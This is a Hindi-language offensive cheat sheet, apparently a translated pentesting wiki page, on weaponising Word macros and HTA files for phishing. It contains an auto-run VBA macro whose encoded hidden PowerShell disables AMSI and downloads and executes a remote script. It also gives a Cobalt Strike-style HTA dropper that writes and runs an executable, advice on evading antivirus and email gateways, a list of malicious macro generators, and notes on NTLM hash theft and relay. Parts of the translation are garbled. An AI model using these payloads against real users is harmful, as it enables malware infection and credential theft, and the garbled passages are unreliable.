ऑफिस दस्तावेज़

माइक्रोसॉफ्ट वर्ड फ़ाइल खोलने से पहले फ़ाइल डेटा मान्यता का कार्य करता है। डेटा मान्यता का कार्य डेटा संरचना पहचान, ऑफिसओपनएक्सएमएल मानक के खिलाफ किया जाता है। यदि डेटा संरचना पहचान के दौरान कोई त्रुटि होती है, तो विश्लेषित की जा रही फ़ाइल नहीं खोली जाएगी।

सामान्यत: वर्ड फ़ाइल मैक्रो का उपयोग करने वाली .docm एक्सटेंशन का उपयोग करती हैं। हालांकि, फ़ाइल का एक्सटेंशन बदलकर फ़ाइल को नाम बदलना संभव है और फिर भी उनके मैक्रो कार्य क्षमताएँ बनाए रखना संभव है। उदाहरण के लिए, एक RTF फ़ाइल मैक्रो का समर्थन नहीं करती है, डिज़ाइन के अनुसार, लेकिन एक DOCM फ़ाइल जिसे RTF में नाम बदल दिया गया होगा, माइक्रोसॉफ्ट वर्ड द्वारा संभाली जाएगी और मैक्रो क्रियान्वयन क्षमताएँ होंगी। एक ही आंतरिक और तंत्र टूल्स का उपयोग सभी माइक्रोसॉफ्ट ऑफिस स्वीट (एक्सेल, पावरपॉइंट आदि) पर लागू होता है।

आप निम्नलिखित कमांड का उपयोग कर सकते हैं जिससे आप यह जांच सकते हैं कि कौन सी एक्सटेंशन कुछ ऑफिस कार्यक्रमों द्वारा क्रियान्वित की जाएगी:

assoc | findstr /i "word excel powerp"

बाहरी छवि लोड

जाएं: Insert --> Quick Parts --> Field श्रेणियाँ: लिंक और संदर्भ, फ़ील्ड नाम: includePicture, और फ़ाइल का नाम या URL: http://<ip>/whatever

मैक्रोस बैकडोर

दस्तावेज से एर्बिट्रे कोड चलाने के लिए मैक्रो का उपयोग संभव है।

ऑटोलोड फ़ंक्शन

जितने अधिक सामान्य होते हैं, उतना ही AV उन्हें पहचानेगा।

• AutoOpen()

• Document_Open()

मैक्रो कोड उदाहरण

Sub AutoOpen()
CreateObject("WScript.Shell").Exec ("powershell.exe -nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA=")
End Sub

Sub AutoOpen()

Dim Shell As Object
Set Shell = CreateObject("wscript.shell")
Shell.Run "calc"

End Sub

Dim author As String
author = oWB.BuiltinDocumentProperties("Author")
With objWshell1.Exec("powershell.exe -nop -Windowsstyle hidden -Command-")
.StdIn.WriteLine author
.StdIn.WriteBlackLines 1

Dim proc As Object
Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
proc.Create "powershell <beacon line generated>

मेटाडेटा को मैन्युअल रूप से हटाएं

फ़ाइल > सूचना > दस्तावेज़ जांचें > दस्तावेज़ जांचें पर जाएं, जिससे दस्तावेज़ इंस्पेक्टर खुलेगा। जांच करें और फिर दस्तावेज़ गुण और व्यक्तिगत जानकारी के पास सभी हटाएं पर क्लिक करें।

डॉक एक्सटेंशन

समाप्त होने पर, सेव एस टाइप ड्रॉपडाउन का चयन करें, फॉर्मेट को .docx से वर्ड 97-2003 .doc में बदलें। इसे इसलिए करें क्योंकि आप .docx के अंदर मैक्रो सहेज नहीं सकते हैं और मैक्रो-सक्षम .docm एक्सटेंशन के आसपास एक कलंक है (जैसे कि थंबनेल आइकन में एक विशाल ! होता है और कुछ वेब/ईमेल गेटवे उन्हें पूरी तरह से ब्लॉक कर देते हैं)। इसलिए, यह पुरानी .doc एक्सटेंशन सबसे अच्छा समझौता है।

हानिकारक मैक्रो जेनरेटर

• MacOS

• macphish

• Mythic Macro Generator

HTA फ़ाइलें

एक एचटीए एक विंडोज प्रोग्राम है जो एचटीए को एचटीए जैसी और जेस्क्रिप्टिंग भाषाओं (जैसे वीबीस्क्रिप्ट और जेस्क्रिप्ट) को संयोजित करता है। यह उपयोगकर्ता इंटरफ़ेस उत्पन्न करता है और एक "पूरी भरोसा करने योग्य" एप्लिकेशन के रूप में कार्यान्वित होता है, ब्राउज़र की सुरक्षा मॉडल की प्रतिबंधनों के बिना।

एक एचटीए को mshta.exe का उपयोग करके कार्यान्वित किया जाता है, जो सामान्यत: इंटरनेट एक्सप्लोरर के साथ स्थापित होता है, जिससे mshta आईई पर निर्भर होता है। इसलिए, अगर यह अनइंस्टॉल किया गया है, तो एचटीए कार्यान्वित नहीं हो पाएगा।

<--! Basic HTA Execution -->
<html>
<head>
<title>Hello World</title>
</head>
<body>
<h2>Hello World</h2>
<p>This is an HTA...</p>
</body>

<script language="VBScript">
Function Pwn()
Set shell = CreateObject("wscript.Shell")
shell.run "calc"
End Function

Pwn
</script>
</html>

<--! Cobal Strike generated HTA without shellcode -->
<script language="VBScript">
Function var_func()
var_shellcode = "<shellcode>"

Dim var_obj
Set var_obj = CreateObject("Scripting.FileSystemObject")
Dim var_stream
Dim var_tempdir
Dim var_tempexe
Dim var_basedir
Set var_tempdir = var_obj.GetSpecialFolder(2)
var_basedir = var_tempdir & "\" & var_obj.GetTempName()
var_obj.CreateFolder(var_basedir)
var_tempexe = var_basedir & "\" & "evil.exe"
Set var_stream = var_obj.CreateTextFile(var_tempexe, true , false)
For i = 1 to Len(var_shellcode) Step 2
var_stream.Write Chr(CLng("&H" & Mid(var_shellcode,i,2)))
Next
var_stream.Close
Dim var_shell
Set var_shell = CreateObject("Wscript.Shell")
var_shell.run var_tempexe, 0, true
var_obj.DeleteFile(var_tempexe)
var_obj.DeleteFolder(var_basedir)
End Function

var_func
self.close
</script>

NTLM प्रमाणीकरण को बलपूर्वक करना

कई तरीके हैं NTLM प्रमाणीकरण "दूरस्थ" करने के लिए, उदाहरण के लिए, आप ईमेल या HTML में अदृश्य छवियाँ जोड़ सकते हैं जिन्हें उपयोगकर्ता तक पहुंचेगा (क्या HTTP MitM?). या पीड़ित को फ़ाइलों का पता भेजें जो फ़ोल्डर खोलने के लिए केवल प्रमाणीकरण को सक्रिय करेगा।

निम्नलिखित पृष्ठों में इन विचारों की जाँच करें:

NTLM रिले

याद रखें कि आप केवल हैश या प्रमाणीकरण चोरी नहीं कर सकते हैं बल्कि NTLM रिले हमले भी कर सकते हैं:

• NTLM रिले हमले

• AD CS ESC8 (NTLM रिले से प्रमाणपत्रों तक)